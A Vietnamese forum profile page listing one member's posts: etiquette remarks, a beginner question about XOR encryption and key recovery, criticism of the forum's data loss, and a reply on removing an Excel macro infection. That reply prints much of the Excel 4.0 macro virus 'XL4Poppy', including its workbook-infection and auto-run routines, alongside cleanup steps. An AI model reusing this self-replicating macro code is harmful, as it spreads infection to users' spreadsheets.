banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: bienxanhlunglinh  XML
Profile for bienxanhlunglinh Messages posted by bienxanhlunglinh [ number of posts not being displayed on this page: 0 ]
 
Dĩ hoà vi quý đi các bạn ơi. Sân chơi chung, tui nghĩ:
- Mỗi người biết một ít - giúp nhau thôi, không biết thì người ta mới hỏi, mà chưa rõ người ta mới hỏi lại.
- Chỉ sợ người không nói mà làm được chứ người nói mà không làm được thì không sợ.
- Không ai tài hơn ai cả - chắc chắn. Vậy cao thấp chỉ còn là cách đối xử với nhau. Nếu căng quá thì đề nghị với Admin xin lập riêng 1 topic, vào đó quang - tung - ném - liệng được cả, choảng nhau chơi - xem ai hơn, còn ở đây sinh hoat chung, vậy có gì nhẹ nhàng với nhau chút, đừng thách đố quá mà cũng đừng doạ nạt quá.

Tui nói thẳng vậy - rất tiếc nếu làm các bạn không vui, có thể đề nghị Admin xoá comment của tui đi cũng được.
------------------------------------------------

Trích:
hic hic trời 1 bạn là nick chữ vàng nhạt mà chưa hiểu đồng bộ dữ liệu là gì à ngạc nhiên quá ........... ý của bạn nêu ra topic này là muốn đồng bộ dữ liệu của các thư mục trong mạng Lan nhỏ

theo tôi bạn nên dùng 1 phần mềm thông dụng rất phổ biến ai cũng biết đó là total commander để đồng bộ dữ liệu các thư mục trên mạng Lan ,còn nếu đồng bộ dữ giữa các mạng Lan lớn thì bạn phải dùng soft riêng bạn phải nói rõ mục đích nhu cầu , còn chuyện đồng bộ dữ liệu giữa các hệ cơ sở dữ liệu như DB2,SQL, vv... thì là 1 vấn đề phức tạp đến bây giờ vẫn chưa giải quyết xong

----------
Nhận định của bồ cũng chỉ là một trong những giả thuyết về "đồng bộ dữ liệu" hoặc cũng chỉ là giới hạn kiến thức của bồ về "đồng bộ dữ liệu" mà thôi. Câu FaL hỏi hoàn toàn cần thiết để xác định biên độ của vấn đề. Chính bồ có đưa ra thắc mắc "bạn phải nói rõ mục đích nhu cầu" cơ mà.

Khi thảo luận, nên tránh lôi mấy cái "màu vàng", "màu cam", "màu xanh" ra để nói. Nhắc nhở bồ một lần nữa: dù bồ có reg 1000 cái nick khác nhau nhưng tiếp tục tham gia diễn đàn với thái độ xúc xiển thì bạn vẫn bị tẩy chay như thường. Reg thì lâu nhưng khóa thì chưa đến 1 giây. Nên nhớ.
Cám ơn các Anh đã nhiệt tình giúp đỡ, code cũng tàm tạm và chạy rồi, vài ngày rảnh em post lên có gì các Anh sửa cho em nhé.
Em đang bận quá. Chúc tất cả Anh chị em vui vẻ.

Em chào Các Anh, Em bận quá, bận túi bụi, topic em viết mà em bận quá, thông cảm cho em 2 ngày nữa nhé.
Vài dòng rồi em phải đi đây. Em rất vui và cám ơn tất cả các Anh - sự nhiệt tình, chia sẻ cùng nhau.., nói chung thấy vui - ko biết nói gì nữa. Em phải đi tí nhé, mai rảnh em quay vào và hỏi thêm các anh nhưng chắc 1 điều là chuỗi nhập vào là tự nhiên (độ dài và kiểu), Key thì đã cố định và không thay đổi chứ ko thể Xor theo kiểu 1 ký tự hoặc cặp ký tự.

Tối em ngồi viết lại xem: [ Đem A xor Key có được B ], rồi [ đem A xor B để tìm Key ]
Em thích cái này, vì Key cố định trong source người dùng ko biết. Mỗi lần nhập A thì B sẽ thay đổi. sau này B sẽ là chuổi bí mật phải có trước khi muốn thực hiện tiếp chuỗi công việc. vì trước khi send file hay gọi Formload đăng nhập App thì Hệ thông sẽ thực hiện tạo chuỗi B, (B sẽ thay đổi mõi lần thực hiện) Sau đó Text_A sẽ invisiable "Readonly" tại người dùng như vậy phải yêu cầu Admin báo chuỗi B là gì để tiếp tục công việc.
Em đi đã nhé, nếu xong cái này thì nhờ tiếp các Anh cái vụ "băm..băm gì đó"

Em vẫn khoái Anh Tal giải thích. Anh tiếp cho em đi. chuỗi nhập vào không hạn chế độ dài và kiểu.
Em chào các Anh.
Bxll xin cám ơn sự nhiệt tình của tất cả các Anh nhé,
To Anh FaL: Cám ơn Anh nhiều nhiều về cái link tech-faq nhé, rất tuyệt! từ đây đi sang cái link http://www.programmer2programmer.net/tips/encryption_decryption/Default.aspx
hay lắm, hy vọng em mần thêm được chút gì đó, ko hiểi lại hỏi các Anh.
Em tóm tắt lại chút yêu cầu để anh rõ hơn:
Dùng phép Xor để thực hiện mã hóa và tìm key, trong đó: Text_A: chuỗi nguồn được nhập vào từ bàn phím, đem mã hóa chuỗi Text_A này có được chuỗi mã hóa Text_B. Nếu ta đem [Text_A] XOR [Text_B] thì tìm được Key_C (Key_C là giá trị cho trước trong chương trình, Vd: char Key_C="Khoa_Ma" )

To Anh Tal : Yêu cầu đúng như ANh nói.
/*=================>
Bạn có 1 key = "helloworld" cố định chẳng hạn
Bạn nhập vào chuỗi A
Output là chuỗi B
Vậy B = A ^ key
Về phía người dùng, người ta không hề biết giá trị của key. Tuy vậy do bản chất của phép toán XOR ta có thể biết key bằng cách lấy A^B (Với mọi A, B miễn là B là kết quả mã hoá của A). Do đó người dùng sẽ lấy được key nếu có A và B. Vậy vấn đề ở đây là nếu ta sử dụng key như thế nào (nếu key là 1 chuỗi). Ví dụ:
- lấy từng ký tự của A và xor với lần lượt từng ký tự của key
- lấy 2 ký tự của A và xor với 2 ký tự của key
....
Vậy chắc bạn gặp khó khăn ở phần này hả?
Còn theo mình nghĩ miễn là B là kết quả của A thì A^B luôn ra key (tất nhiên là phải đúng thuật toán)
===================>*/

Anh giúp em tiếp đi. Em chỉ làm được Dialog1: Mã hóa chuỗi A nhập vào được chuỗi mã hóa B, Dialog2: Giải mã ngược lại. Em không làm được khi phối hợp mã hóa Chuỗi A + giá trị của Key_C để có được chuỗ Mã hóa B, từ đó ta Lấy Chuỗi A Xor với B thì sẽ tìm ra được Key_C đã gán trước trong code chương trình ?

EM hỏi thêm (Mở rộng): Nếu sau khi hoàn tất được yêu cầu trên (mã hóa: A + Key = B, vậy Kết hợp A ^ B ==>Key_C ) thì có thể mở rộng thêm chút là :
Coi như mình là người dùng, không biết giá trị Key_C, thể gán lặp for cho 2 biến i và j cho 2 thằng này chạy mụch đích của là sẽ đi tìm từng giá trị của Key? theo phương pháp Key_gen. Có được không các Anh?







Thanks Anh FaL nhé, Bxll ko muốn care nhiều đến cách thảo luận như K4I thể hiện (dù K4I là bất kỳ ai và như thế nào) trong 1 thảo luận về kiến thức, bỏ cái này qua bên đi Anh, Bxll cỏ vẻ như đã được 2 Dialog Mã hóa và giãi mã chuỗi nhập vào bằng Xor, Cái giải mã cái chuỗi A nhập vào thì ngược lại so với khi Mã hóa.

Nhưng cái Dialog Tim key thì chịu. (Key là 1 giá trị được cố định trước trong chương trình ==> ko thay đổi được, trong khi giá trị plaintext nhập vào sẽ khác nhau mỗi lần nhập ==> giá trị sau khi mã hóa cũng sẽ thay đỗi), cụ thể:
Key_C="xin chao" //được gán trước, cố định trong code

Plaintext_A: nhập chuổi muốn mã hóa
Enziptext_B: chuỗi đã được mã hóa từ chuỗi A
theo yêu cầu đem chuỗi A ^ chuỗi B sẽ tìm ra chuỗi Key_C nhưng không cho phép nếu A Xor B ==' ' Msgbxo (" ");
vì các giá trị A và B luôn thay đổi theo mỗi lần nhập nên nếu Key_C đứng độc lập thì sao tìm (ko logic trong cấu trúc?) Vậy khi IDD_ma_Hoa phải kết hợp chuỗi nhập vào A kết hợp với Key đã cho để có chuỗi được mã hóa B, sau đó khi tiến hành Xor A với B thì mới có cơ sở tìm ra được Key_C chứ phải không Anh?
Nói chung cái đoạn tìm key là bxll không làm được, và giả thiết thêm nữa là nếu Key_C (cố định được gán trước) mà ta không biế`t là gì thì sao?

Thanks anh và mong nhận được hỗ trợ trong diễn đàn nhé.
Em chào các đại cao thủ, cứ tưởng các đại ca tận tình giúp đỡ chứ, đằng này lại bị cảnh cáo mới chán chứ.
Nói thẳng chút nhé, Dại ca K4i thì nói "Bạn có biết toán tử XOR trong C/C++ là gì không?" Vậy dại ca bóp đầu cái coi xem hiểu đc bao nhiêu C/C++ rồi ? ==>chán!
Bxll thì nghĩ cái Tin học thì có ai biết hết ? biết thôi cũng là quá cao siêu rồi. Bạn K4i hỏi nghe y như văn sĩ phòng thương mại của Microsoft thuyết trình ấy!

Sorry đã send PM cho Anh FaL, Anh trách thế cũng đúng, có điều cái gì khó người ta đã cố gắng nhưng không làm được tức là vượt qua sức họ hoặc vượt qua khả năng của họ mới phải đi nhờ. Khó mới đi nhờ chứ đã làm được rồi thì chẳng nhờ các đại ca làm gì, và có thế mới nói rằng "...xin nhờ các Đại Cao Thủ giúp đỡ..." chứ nếu ko phải thế thì sẽ nói rằng "...đố các anh em làm đượpc đấy..." 2 câu trên có khác nhau không Anh? Thêm nữa vì giữ phép tôn trọng và hy vọng vào giúp đở cái mà Bxll không làm nổi nên Bxll mới gởi PM cho Anh và vì đã đọc bào viết của anh trên điễn đàn nên mới hy vọng nhiều vào anh như thế. Anh thử nghĩ xem - nếu Anh là Bxll? Anh sẽ giúp Bxll chứ?




Các cao thủ vui lòng giúp em 1 bài mã hóa nhé. viết bằng Visual C++
Yêu cầu Mã hóa:
Nhập 1 chuỗi vào đối tượng Edit Textbox và click nút Mã hóa sẽ xuất ra chuỗi được mã hóa ở Edit Textbox thứ 2.
Nếu ta đem {Chuỗi nguồn} XOR với {chuỗi đã mã hóa} thì tìm được giá trị key, Trong đó key là 1 giá trị kiểu chuỗi cho trước, chẳng hạn họ tên mình

Ví dụ:
Dialog_1: Mã hóa: Nhập chuỗi cần mã hóa vào Edit Textbox_1, click Mã_hóa sẽ xuất ra trong Edit Textbox_2 đoạn chuỗi được mã hóa.
Edit Textbox_1 ==> Nhập AAA
Click Mã_hóa
Edit Textbox_2 ==> xuất HHH

Dialog_2 Giả mã (sẽ ngược với chu trình trên trong biến cố Command_giãi_mã)
Dialog_3 Tìm_Key: Key này là 1 giá trị kiểu chuỗi, cố định ví dụ như họ tên mình và được gán trước trong code chương trình
yêu cầu: nếu đem chuỗi cần mã hóa Xor với chuỗi đã được mã hóa thì tìm được key
Cụ thể là: chuổi nhập cần mã hóa [AAA] Xor [HHH] chuỗi đã được mã hóa sẽ tìm ra Key = [Tran_Van_A] đã được gán trước trong chương trình và key này là cố định.

Em làm nhưng không làm được, rất mong các cao thủ giúp em

neomatrix wrote:
Chào tất cả thành viên HVA rất vui khi HVA hoạt động trở lại smilie
Cho mình hỏi có cách nào để xóa các Macro bị nhiễm trong Excel k? reply cho mình với.thankx  


**Simple Payload**
=ALERT("XF. VicodinES", 2)
=ALERT("ⓒ Network", 2)
=RETURN()

**Add New Workbook, Infect It, Save It As ÿÿÿÿÿ.xls**
=IF(FILES(A3)="ÿÿÿÿÿ.",0,99)
=ERROR(TRUE,MakeIt)
=IF(A21=0)
=RETURN()
=END.IF()
=NEW(1)
=WORKBOOK.INSERT(1)
=WORKBOOK.INSERT(1)
=ACTIVATE.PREV()
=RUN(C18)
=WORKBOOK.COPY("XL4Poppy",A1)
=WORKBOOK.NAME("Sheet3","Sheet99")
=WORKBOOK.NAME("Sheet1","Sheet3")
=WORKBOOK.NAME("Sheet99","Sheet1")
=PROTECT.DOCUMENT(TRUE,,"VicodinES",TRUE)
=WORKBOOK.PREV()
=WORKBOOK.PREV()
=WORKBOOK.PREV()
=SAVE.AS(A3)
=FILE.CLOSE()
=RETURN()
=WORKBOOK.HIDE("XL4Poppy")

**Auto and On Sheet Starts Here**
=RUN(C18)
=ERROR(TRUE, Continue)
=IF(A4=3)
=RETURN()
=END.IF()
=ERROR(FALSE)
=RUN(A21)
=ON.TIME("6:30:00 PM", "Hello")
=ON.TIME("6:30:00 AM", "")
=ON.SHEET(,"Poppy",TRUE)
=RETURN()


**Set Our Values and Paths**
=SET.VALUE($A$3,(GET.WORKSPACE(32) & "\xlstart\ÿÿÿÿÿ."))
=SET.NAME("Document_array", DOCUMENTS())
=SET.VALUE($A$1, INDEsmilieDocument_array,2))
=SET.VALUE($A$2, INDEsmilieDocument_array,1))
=SET.VALUE($A$4,GET.DOCUMENT(3,"["&A1&"]"&"XL4Poppy"))
=RETURN()


**Infect Workbook**
=RUN(C19)
=ERROR(TRUE,Bust)
=IF(A4=3)
=RETURN()
=ERROR(FALSE)
=ACTIVATE.PREV()
=RUN(C19)
=WORKBOOK.COPY("XL4Poppy",A1)
=END.IF()
=RETURN()


=APP.TITLE("XF.Classic.Poppy")
=MESSAGE(TRUE, " good morning!")
=RETURN()

Hãy làm như các bạn đã chỉ dẫn:
- fomart -> lần lượt unhide sheet và xoá tất cả các shhet do macro sinh ra [XL 4Popy] (tăng lên theo số lần kích hoạt 2,3,4...) = lúc này bạn đã xoá được các nội dung mà macro code dùng để lây nhiễm.
- lần lượt xoá hết các book hoặc ÿÿÿÿÿ trong C:\Program Files\Microsoft Office\OFFICE11\xlstart
- Rất nhiều trường hợp sau khi xoá các sheet macro hiden này (Macro ko lây lan được nũa) nhưng vẫn tồn tại các code kêu macro cụ thể là các thủ tục điểu khiển hiend như Auto_close, Auto_open, Bút, continue..vv. khiến phiên làm việc với file dữ liệu thêm rắc rối, và có thể gây phiền toái với các bạn mà skill máy tính là chưa nhiều. Bạn cần phải xoá hết các thủ tục này rồi save lại. Xong.

- Loại macro kiểu thế này thì Anti BKAV mù, NAV phát hiện được thao tác del vẫn tốt nhưng thực ra thì ko diệt đc. Mong bạn thành công.
- Có gì trục trặc bạn contact với bienxanhlunglinh Y!M: nha_que_mu_tin_hoc

"Do database của forum cũ bị phá hỏng rất nặng nề, phần lớn các bài viết trên forum cũ bị viết chồng lên bằng những thông điệp vô giá trị. "Tác phẩm" phá hoại này được gây nên bởi một loại script tự động vào sớm ngày 1/5/2006. Trong khoảng thời gian ấy (và trước đó), hệ thống lưu trữ của database trên máy chủ HVA có sự cố nên việc phục hồi rất khó khăn và hạn chế."


Bxll rất hâm mộ diễn đàn HVA nhưng theo thông tin bên trên thi nghe có vẻ không vào cho lắm.
- Bộc lộ 1 lần bị phá huỷ mang tính công nghệ và kỹ thuật rất IT. 1 website bị phá hoại liên quan đến mất dữ liệu đó là việc bình thường nhưng việc backup của HVA ra sao khi mà với 1 lượng data khổng lố và rất giá trị như thế bị phá huỷ là trắng tay sao? là HVA thì hơn ai hết ở đây hiểu rằng 1 PC hiện đại nhất chẳng đáng giá bằng 1% giá trị của dữ liệu trong nó, Bxll thiết nghĩ HVA forum hỏng là chuyện IT bình dân giống như đời sinh viên ta đi ăn cơm bụi vậy, nhưng giữ gìn data an toàn trong và đang trong tình bị phá hoại là chuyện lớn, cực kỳ lớn và quan trọng có lẽ việc quan trọng này ko vượt quá tầm có vượt quá mức kiểm soát bởi các kỹ thuật pro của HVA không? Có lẽ cái tính chất của backup chưa đủ quan trọng với HVA chăng? Mất dữ liệu - Buồn quá!
- Việc "..quá trình chuyển dời dữ liệu từ forum cũ sang forum mới đã vướng phải những trở ngại đáng kể. Cấu trúc dữ liệu giữa hai forum rất khác biệt, vô số bài viết trên forum cũ có tác giả không còn tồn tại, vô số các bài viết được format và lưu trữ trong cơ sở dữ liệu mang những điểm không tương đồng. Điều này dẫn đến những trở ngại lớn lao khi chuyển dời dữ liệu..." Điều này làm tôi nhớ đến câu nói của bác Lê Hoàn thuật lại lời 1 nhân vật khác nói khá lâu rồi "..mức độ IT hiện nay là rất giỏi nhưng chỉ có điều cái giỏi chỉ ở phần ngọn, còn phần gốc thì chưa được chú ý đến hoặc hời hợt..., 1 người đi học IT lập trình với những visual thì rất nhanh nhưng khi những visual bỗng nhiên treo ko chạy được thì lập trình viên hì hục gọi bảo trì đến vì ko thể tự khắc phục lỗi thuộc về các cấu trúc cấp thấp này"
- Vài suy nghĩ về IT nói chung, HVA nói riêng, mong HVA xem đây là chút đắn đo của thành viên trong club chỉ mong HVA ngày càng lớn mạnh theo đúng nghĩa của nó. Nếu BQT HVA thấy suy nghĩ như thế này HVA ko chấp nhận được thì cứ Del bài của BXLL đi, BXLL hoàn toàn ko vấn đề gì cả vì HVA của các bạn cơ mà, BXLL chỉ là 1 thành viên trong www mênh mông này.
Chào các bạn.
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|